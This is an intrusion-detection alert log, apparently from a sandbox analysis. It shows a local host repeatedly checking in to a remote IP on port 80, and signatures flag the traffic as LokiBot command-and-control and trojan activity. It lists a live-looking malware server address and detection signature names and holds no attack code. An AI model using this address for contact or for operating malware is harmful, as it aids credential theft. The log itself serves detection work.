2025-01-11T07:45:44.450980+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50065	94.156.177.41	80	TCP
2025-01-11T07:45:45.428851+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50066	94.156.177.41	80	TCP
2025-01-11T07:45:46.295558+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50067	94.156.177.41	80	TCP
2025-01-11T07:45:47.180099+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50068	94.156.177.41	80	TCP
2025-01-11T07:45:48.062041+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50069	94.156.177.41	80	TCP
2025-01-11T07:45:48.926425+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50070	94.156.177.41	80	TCP
2025-01-11T07:45:49.824114+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50071	94.156.177.41	80	TCP
2025-01-11T07:45:50.734862+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50072	94.156.177.41	80	TCP
2025-01-11T07:45:51.619631+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50073	94.156.177.41	80	TCP
2025-01-11T07:45:52.455714+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50074	94.156.177.41	80	TCP
2025-01-11T07:45:53.300650+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50075	94.156.177.41	80	TCP
2025-01-11T07:45:54.576109+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50076	94.156.177.41	80	TCP
2025-01-11T07:45:55.483384+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50077	94.156.177.41	80	TCP
2025-01-11T07:45:56.355282+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50078	94.156.177.41	80	TCP
2025-01-11T07:45:57.212131+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50079	94.156.177.41	80	TCP
2025-01-11T07:45:58.216432+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50080	94.156.177.41	80	TCP
2025-01-11T07:45:59.120917+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50081	94.156.177.41	80	TCP
2025-01-11T07:45:59.986914+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50082	94.156.177.41	80	TCP
2025-01-11T07:46:00.838213+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50083	94.156.177.41	80	TCP
2025-01-11T07:46:01.716963+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50084	94.156.177.41	80	TCP
2025-01-11T07:46:02.579117+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50085	94.156.177.41	80	TCP
2025-01-11T07:46:03.569616+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50086	94.156.177.41	80	TCP
2025-01-11T07:46:04.429247+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50087	94.156.177.41	80	TCP
2025-01-11T07:46:05.309228+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50088	94.156.177.41	80	TCP
2025-01-11T07:46:06.196145+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50089	94.156.177.41	80	TCP
2025-01-11T07:46:07.103223+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50090	94.156.177.41	80	TCP
2025-01-11T07:46:07.967380+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50091	94.156.177.41	80	TCP
2025-01-11T07:46:08.856365+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50092	94.156.177.41	80	TCP
2025-01-11T07:46:09.756222+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50093	94.156.177.41	80	TCP
2025-01-11T07:46:10.621993+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50094	94.156.177.41	80	TCP
2025-01-11T07:46:11.520963+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50095	94.156.177.41	80	TCP
2025-01-11T07:46:12.414303+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50096	94.156.177.41	80	TCP
2025-01-11T07:46:13.286242+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50097	94.156.177.41	80	TCP
2025-01-11T07:46:14.163375+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50098	94.156.177.41	80	TCP
2025-01-11T07:46:15.040084+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50099	94.156.177.41	80	TCP
2025-01-11T07:46:15.899908+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50100	94.156.177.41	80	TCP
2025-01-11T07:46:16.788672+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50101	94.156.177.41	80	TCP
2025-01-11T07:46:17.639411+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50102	94.156.177.41	80	TCP
2025-01-11T07:46:18.636150+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50103	94.156.177.41	80	TCP
2025-01-11T07:46:19.502502+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50104	94.156.177.41	80	TCP
2025-01-11T07:46:20.387384+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50105	94.156.177.41	80	TCP
2025-01-11T07:46:21.299723+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50106	94.156.177.41	80	TCP
2025-01-11T07:46:22.345032+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50107	94.156.177.41	80	TCP
2025-01-11T07:46:23.228495+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50108	94.156.177.41	80	TCP
2025-01-11T07:46:24.079217+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50109	94.156.177.41	80	TCP
2025-01-11T07:46:24.943363+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50110	94.156.177.41	80	TCP
2025-01-11T07:46:25.812030+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50111	94.156.177.41	80	TCP
2025-01-11T07:46:26.689397+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50112	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:44:25.599550+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49707	94.156.177.41	80	TCP
2025-01-11T07:44:26.514901+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49708	94.156.177.41	80	TCP
2025-01-11T07:44:27.307244+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49709	94.156.177.41	80	TCP
2025-01-11T07:44:28.191011+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49711	94.156.177.41	80	TCP
2025-01-11T07:44:29.096261+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49713	94.156.177.41	80	TCP
2025-01-11T07:44:30.130805+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49714	94.156.177.41	80	TCP
2025-01-11T07:44:31.013403+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49715	94.156.177.41	80	TCP
2025-01-11T07:44:32.794115+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49716	94.156.177.41	80	TCP
2025-01-11T07:44:33.799410+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49717	94.156.177.41	80	TCP
2025-01-11T07:44:34.671202+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49718	94.156.177.41	80	TCP
2025-01-11T07:44:35.543288+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49719	94.156.177.41	80	TCP
2025-01-11T07:44:36.441284+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49720	94.156.177.41	80	TCP
2025-01-11T07:44:37.566875+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49721	94.156.177.41	80	TCP
2025-01-11T07:44:38.454563+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49722	94.156.177.41	80	TCP
2025-01-11T07:44:39.345173+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49724	94.156.177.41	80	TCP
2025-01-11T07:44:40.457078+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49725	94.156.177.41	80	TCP
2025-01-11T07:44:41.331671+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49730	94.156.177.41	80	TCP
2025-01-11T07:44:42.253637+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49738	94.156.177.41	80	TCP
2025-01-11T07:44:43.098513+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49743	94.156.177.41	80	TCP
2025-01-11T07:44:43.980050+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49749	94.156.177.41	80	TCP
2025-01-11T07:44:44.852549+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49755	94.156.177.41	80	TCP
2025-01-11T07:44:45.728633+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49761	94.156.177.41	80	TCP
2025-01-11T07:44:46.611946+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49771	94.156.177.41	80	TCP
2025-01-11T07:44:47.470301+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49777	94.156.177.41	80	TCP
2025-01-11T07:44:48.343700+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49784	94.156.177.41	80	TCP
2025-01-11T07:44:49.359567+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49790	94.156.177.41	80	TCP
2025-01-11T07:44:50.222647+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49796	94.156.177.41	80	TCP
2025-01-11T07:44:51.232327+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49804	94.156.177.41	80	TCP
2025-01-11T07:44:52.093577+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49811	94.156.177.41	80	TCP
2025-01-11T07:44:52.995437+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49816	94.156.177.41	80	TCP
2025-01-11T07:44:53.931455+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49821	94.156.177.41	80	TCP
2025-01-11T07:44:54.835228+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49826	94.156.177.41	80	TCP
2025-01-11T07:44:55.697158+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49834	94.156.177.41	80	TCP
2025-01-11T07:44:56.576534+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49840	94.156.177.41	80	TCP
2025-01-11T07:44:57.442816+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49849	94.156.177.41	80	TCP
2025-01-11T07:44:58.295544+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49855	94.156.177.41	80	TCP
2025-01-11T07:44:59.483479+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49862	94.156.177.41	80	TCP
2025-01-11T07:45:00.369812+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49869	94.156.177.41	80	TCP
2025-01-11T07:45:01.246794+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49878	94.156.177.41	80	TCP
2025-01-11T07:45:02.314357+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49884	94.156.177.41	80	TCP
2025-01-11T07:45:03.331453+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49891	94.156.177.41	80	TCP
2025-01-11T07:45:04.209206+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49899	94.156.177.41	80	TCP
2025-01-11T07:45:05.082273+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49905	94.156.177.41	80	TCP
2025-01-11T07:45:05.957442+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49911	94.156.177.41	80	TCP
2025-01-11T07:45:07.173718+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49919	94.156.177.41	80	TCP
2025-01-11T07:45:08.037685+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49928	94.156.177.41	80	TCP
2025-01-11T07:45:08.914118+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49934	94.156.177.41	80	TCP
2025-01-11T07:45:09.933380+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49939	94.156.177.41	80	TCP
2025-01-11T07:45:10.851770+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49945	94.156.177.41	80	TCP
2025-01-11T07:45:11.717555+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49953	94.156.177.41	80	TCP
2025-01-11T07:45:12.578126+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49961	94.156.177.41	80	TCP
2025-01-11T07:45:13.478552+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49968	94.156.177.41	80	TCP
2025-01-11T07:45:14.340906+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49974	94.156.177.41	80	TCP
2025-01-11T07:45:15.208568+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49980	94.156.177.41	80	TCP
2025-01-11T07:45:16.076063+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49986	94.156.177.41	80	TCP
2025-01-11T07:45:16.950781+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49993	94.156.177.41	80	TCP
2025-01-11T07:45:17.828451+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50002	94.156.177.41	80	TCP
2025-01-11T07:45:18.943087+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50010	94.156.177.41	80	TCP
2025-01-11T07:45:19.816581+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50016	94.156.177.41	80	TCP
2025-01-11T07:45:20.695534+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50022	94.156.177.41	80	TCP
2025-01-11T07:45:21.906791+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50027	94.156.177.41	80	TCP
2025-01-11T07:45:22.801196+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50037	94.156.177.41	80	TCP
2025-01-11T07:45:23.654933+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50043	94.156.177.41	80	TCP
2025-01-11T07:45:24.666068+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50044	94.156.177.41	80	TCP
2025-01-11T07:45:25.549065+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50045	94.156.177.41	80	TCP
2025-01-11T07:45:26.431338+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50046	94.156.177.41	80	TCP
2025-01-11T07:45:27.499770+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50047	94.156.177.41	80	TCP
2025-01-11T07:45:28.375675+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50048	94.156.177.41	80	TCP
2025-01-11T07:45:29.280517+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50049	94.156.177.41	80	TCP
2025-01-11T07:45:30.122846+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50050	94.156.177.41	80	TCP
2025-01-11T07:45:30.991478+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50051	94.156.177.41	80	TCP
2025-01-11T07:45:31.859651+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50052	94.156.177.41	80	TCP
2025-01-11T07:45:32.741029+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50053	94.156.177.41	80	TCP
2025-01-11T07:45:33.607086+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50054	94.156.177.41	80	TCP
2025-01-11T07:45:34.487775+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50055	94.156.177.41	80	TCP
2025-01-11T07:45:35.345550+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50056	94.156.177.41	80	TCP
2025-01-11T07:45:36.525051+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50057	94.156.177.41	80	TCP
2025-01-11T07:45:37.400062+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50058	94.156.177.41	80	TCP
2025-01-11T07:45:38.410807+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50059	94.156.177.41	80	TCP
2025-01-11T07:45:39.302388+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50060	94.156.177.41	80	TCP
2025-01-11T07:45:40.165796+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50061	94.156.177.41	80	TCP
2025-01-11T07:45:41.015055+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50062	94.156.177.41	80	TCP
2025-01-11T07:45:42.032602+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50063	94.156.177.41	80	TCP
2025-01-11T07:45:42.904942+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50064	94.156.177.41	80	TCP
2025-01-11T07:45:43.761690+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50065	94.156.177.41	80	TCP
2025-01-11T07:45:44.721124+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50066	94.156.177.41	80	TCP
2025-01-11T07:45:45.593770+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50067	94.156.177.41	80	TCP
2025-01-11T07:45:46.450873+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50068	94.156.177.41	80	TCP
2025-01-11T07:45:47.341627+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50069	94.156.177.41	80	TCP
2025-01-11T07:45:48.223334+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50070	94.156.177.41	80	TCP
2025-01-11T07:45:49.103767+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50071	94.156.177.41	80	TCP
2025-01-11T07:45:49.999889+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50072	94.156.177.41	80	TCP
2025-01-11T07:45:50.897746+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50073	94.156.177.41	80	TCP
2025-01-11T07:45:51.767772+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50074	94.156.177.41	80	TCP
2025-01-11T07:45:52.610435+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50075	94.156.177.41	80	TCP
2025-01-11T07:45:53.849528+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50076	94.156.177.41	80	TCP
2025-01-11T07:45:54.733799+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50077	94.156.177.41	80	TCP
2025-01-11T07:45:55.638595+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50078	94.156.177.41	80	TCP
2025-01-11T07:45:56.514453+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50079	94.156.177.41	80	TCP
2025-01-11T07:45:57.364760+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50080	94.156.177.41	80	TCP
2025-01-11T07:45:58.382542+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50081	94.156.177.41	80	TCP
2025-01-11T07:45:59.299658+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50082	94.156.177.41	80	TCP
2025-01-11T07:46:00.145771+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50083	94.156.177.41	80	TCP
2025-01-11T07:46:00.982126+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50084	94.156.177.41	80	TCP
2025-01-11T07:46:01.873444+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50085	94.156.177.41	80	TCP
2025-01-11T07:46:02.873702+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50086	94.156.177.41	80	TCP
2025-01-11T07:46:03.722760+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50087	94.156.177.41	80	TCP
2025-01-11T07:46:04.607701+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50088	94.156.177.41	80	TCP
2025-01-11T07:46:05.489996+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50089	94.156.177.41	80	TCP
2025-01-11T07:46:06.353603+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50090	94.156.177.41	80	TCP
2025-01-11T07:46:07.255437+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50091	94.156.177.41	80	TCP
2025-01-11T07:46:08.138322+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50092	94.156.177.41	80	TCP
2025-01-11T07:46:09.033339+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50093	94.156.177.41	80	TCP
2025-01-11T07:46:09.910608+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50094	94.156.177.41	80	TCP
2025-01-11T07:46:10.798044+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50095	94.156.177.41	80	TCP
2025-01-11T07:46:11.690985+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50096	94.156.177.41	80	TCP
2025-01-11T07:46:12.563647+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50097	94.156.177.41	80	TCP
2025-01-11T07:46:13.437852+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50098	94.156.177.41	80	TCP
2025-01-11T07:46:14.311717+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50099	94.156.177.41	80	TCP
2025-01-11T07:46:15.196451+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50100	94.156.177.41	80	TCP
2025-01-11T07:46:16.066977+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50101	94.156.177.41	80	TCP
2025-01-11T07:46:16.947180+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50102	94.156.177.41	80	TCP
2025-01-11T07:46:17.795814+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50103	94.156.177.41	80	TCP
2025-01-11T07:46:18.795869+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50104	94.156.177.41	80	TCP
2025-01-11T07:46:19.678030+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50105	94.156.177.41	80	TCP
2025-01-11T07:46:20.545406+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50106	94.156.177.41	80	TCP
2025-01-11T07:46:21.450794+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50107	94.156.177.41	80	TCP
2025-01-11T07:46:22.498284+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50108	94.156.177.41	80	TCP
2025-01-11T07:46:23.372578+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50109	94.156.177.41	80	TCP
2025-01-11T07:46:24.220617+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50110	94.156.177.41	80	TCP
2025-01-11T07:46:25.095420+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50111	94.156.177.41	80	TCP
2025-01-11T07:46:25.958653+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50112	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:44:25.599550+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49707	94.156.177.41	80	TCP
2025-01-11T07:44:26.514901+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49708	94.156.177.41	80	TCP
2025-01-11T07:44:27.307244+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49709	94.156.177.41	80	TCP
2025-01-11T07:44:28.191011+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49711	94.156.177.41	80	TCP
2025-01-11T07:44:29.096261+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49713	94.156.177.41	80	TCP
2025-01-11T07:44:30.130805+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49714	94.156.177.41	80	TCP
2025-01-11T07:44:31.013403+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49715	94.156.177.41	80	TCP
2025-01-11T07:44:32.794115+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49716	94.156.177.41	80	TCP
2025-01-11T07:44:33.799410+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49717	94.156.177.41	80	TCP
2025-01-11T07:44:34.671202+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49718	94.156.177.41	80	TCP
2025-01-11T07:44:35.543288+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49719	94.156.177.41	80	TCP
2025-01-11T07:44:36.441284+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49720	94.156.177.41	80	TCP
2025-01-11T07:44:37.566875+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49721	94.156.177.41	80	TCP
2025-01-11T07:44:38.454563+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49722	94.156.177.41	80	TCP
2025-01-11T07:44:39.345173+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49724	94.156.177.41	80	TCP
2025-01-11T07:44:40.457078+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49725	94.156.177.41	80	TCP
2025-01-11T07:44:41.331671+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49730	94.156.177.41	80	TCP
2025-01-11T07:44:42.253637+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49738	94.156.177.41	80	TCP
2025-01-11T07:44:43.098513+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49743	94.156.177.41	80	TCP
2025-01-11T07:44:43.980050+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49749	94.156.177.41	80	TCP
2025-01-11T07:44:44.852549+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49755	94.156.177.41	80	TCP
2025-01-11T07:44:45.728633+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49761	94.156.177.41	80	TCP
2025-01-11T07:44:46.611946+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.41	80	TCP
2025-01-11T07:44:47.470301+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49777	94.156.177.41	80	TCP
2025-01-11T07:44:48.343700+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49784	94.156.177.41	80	TCP
2025-01-11T07:44:49.359567+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49790	94.156.177.41	80	TCP
2025-01-11T07:44:50.222647+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49796	94.156.177.41	80	TCP
2025-01-11T07:44:51.232327+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49804	94.156.177.41	80	TCP
2025-01-11T07:44:52.093577+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49811	94.156.177.41	80	TCP
2025-01-11T07:44:52.995437+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49816	94.156.177.41	80	TCP
2025-01-11T07:44:53.931455+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49821	94.156.177.41	80	TCP
2025-01-11T07:44:54.835228+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49826	94.156.177.41	80	TCP
2025-01-11T07:44:55.697158+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49834	94.156.177.41	80	TCP
2025-01-11T07:44:56.576534+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49840	94.156.177.41	80	TCP
2025-01-11T07:44:57.442816+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49849	94.156.177.41	80	TCP
2025-01-11T07:44:58.295544+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49855	94.156.177.41	80	TCP
2025-01-11T07:44:59.483479+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49862	94.156.177.41	80	TCP
2025-01-11T07:45:00.369812+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49869	94.156.177.41	80	TCP
2025-01-11T07:45:01.246794+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49878	94.156.177.41	80	TCP
2025-01-11T07:45:02.314357+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49884	94.156.177.41	80	TCP
2025-01-11T07:45:03.331453+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49891	94.156.177.41	80	TCP
2025-01-11T07:45:04.209206+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49899	94.156.177.41	80	TCP
2025-01-11T07:45:05.082273+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49905	94.156.177.41	80	TCP
2025-01-11T07:45:05.957442+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49911	94.156.177.41	80	TCP
2025-01-11T07:45:07.173718+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49919	94.156.177.41	80	TCP
2025-01-11T07:45:08.037685+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49928	94.156.177.41	80	TCP
2025-01-11T07:45:08.914118+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49934	94.156.177.41	80	TCP
2025-01-11T07:45:09.933380+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49939	94.156.177.41	80	TCP
2025-01-11T07:45:10.851770+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49945	94.156.177.41	80	TCP
2025-01-11T07:45:11.717555+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49953	94.156.177.41	80	TCP
2025-01-11T07:45:12.578126+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49961	94.156.177.41	80	TCP
2025-01-11T07:45:13.478552+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49968	94.156.177.41	80	TCP
2025-01-11T07:45:14.340906+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49974	94.156.177.41	80	TCP
2025-01-11T07:45:15.208568+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49980	94.156.177.41	80	TCP
2025-01-11T07:45:16.076063+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49986	94.156.177.41	80	TCP
2025-01-11T07:45:16.950781+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49993	94.156.177.41	80	TCP
